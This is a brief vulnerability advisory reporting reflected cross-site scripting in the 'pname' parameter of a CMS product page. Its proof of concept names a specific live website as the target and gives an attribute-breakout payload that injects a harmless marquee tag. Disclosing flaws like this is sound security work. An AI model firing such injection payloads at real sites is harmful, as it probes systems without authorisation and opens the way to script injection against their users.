# Cross Site Scripting on DuBose Web Group CMS
# Risk: Low
# CWE number: CWE-79
# Date: 19/04/2014
# Vendor: www.duboseweb.com
# Author: Felipe Gabriel Renzi
# Contact: renzi@linuxmail.org
# Tested on Windows 8 pro
# Vulnerable File: product.php
# Exploit: http://host/path/product.php?pname=[xss]
# PoC:
- Target: http://www.palmettopropane.com
- Vuln. File: /Residential/product.php?pname=
- Exploit: "><marquee>Vulnerable</marquee>